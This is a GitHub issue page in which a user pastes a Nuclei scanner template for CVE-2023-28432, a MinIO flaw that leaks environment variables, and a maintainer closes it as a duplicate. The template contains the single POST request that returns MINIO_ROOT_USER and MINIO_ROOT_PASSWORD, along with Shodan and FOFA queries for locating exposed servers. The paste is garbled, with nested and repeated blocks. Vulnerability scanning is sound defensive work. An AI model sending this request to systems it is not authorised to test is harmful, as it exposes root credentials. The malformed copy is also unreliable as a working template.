Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

salimisaev6991 #11405

Closed
vasiliska140293 opened this issue Dec 23, 2024 · 1 comment
Closed

salimisaev6991 #11405

vasiliska140293 opened this issue Dec 23, 2024 · 1 comment
Assignees
Labels
Done Ready to merge

Comments

@vasiliska140293
Copy link

id: CVE-2023-28432

info:
name: id: CVE-2023-28432

info:
name: MinIO Cluster Deployment - Information Disclosure
author: Mr-xn
severity: high
description: |
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
reference:
- GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
- golang/vulndb#1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
- https://nvd.nist.gov/vuln/detail/CVE-2023-28432
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200,NVD-CWE-noinfo
epss-score: 0.14384
epss-percentile: 0.95092
cpe: cpe:2.3:a:minio:minio::::::::
metadata:
verified: true
max-request: 1
vendor: minio
product: minio
shodan-query: title:"Minio Console"
fofa-query: app="Minio"
tags: cve,cve2023,minio,console,exposure,kev

http:

  • raw:

    • |+
      POST /minio/bootstrap/v1/verify HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:

    • type: word
      part: body
      words:

      • '"MINIO_ROOT_PASSWORD":'
      • '"MINIO_ROOT_USER":'
      • '"MinioEnv":'
        condition: or
    • type: word
      part: header
      words:

      • 'text/plain'
    • type: status
      status:

      • 200 - Information Disclosure
        author: Mr-xn
        severity: high
        description: |
        MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
        remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
        reference:
    • GHSA-6xvq-wj2x-3h3q

    • https://github.com/minio/minio/pull/16853/files

    • x/vulndb: potential Go vuln in github.com/minio/minio: CVE-2023-28432 golang/vulndb#1667

    • https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json

    • https://nvd.nist.gov/vuln/detail/CVE-2023-28432
      classification:
      cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
      cvss-score: 7.5
      cve-id: CVE-2023-28432
      cwe-id: CWE-200,NVD-CWE-noinfo
      epss-score: 0.14384
      epss-percentile: 0.95092
      cpe: cpe:2.3:a:minio:minio::::::::
      metadata:
      verified: true
      max-request: 1
      vendor: minio
      product: minio
      shodan-query: title:"Minio Console"
      fofa-query: app="Minio"
      tags: cve,cve2023,minio,console,exposure,kev

http:

  • raw:

    • |+
      POST /minio/bootstrap/v1/verify HTTP/1.1
      Host: {{Hostname}}
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:

    • type: word
      part: body
      words:

      • '"MINIO_ROOT_PASSWORD":'
      • '"MINIO_ROOT_USER":'
      • '"MinioEnv":'
        condition: or
    • type: word
      part: header
      words:

      • 'text/plain'
    • type: status
      status:

      • 200
@DhiyaneshGeek
Copy link
Member

Hi @vasiliska140293

we already have a template for this https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-28432.yaml

so we are closing this issue

Thanks

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Dec 23, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Done Ready to merge
Projects
None yet
Development

No branches or pull requests

3 participants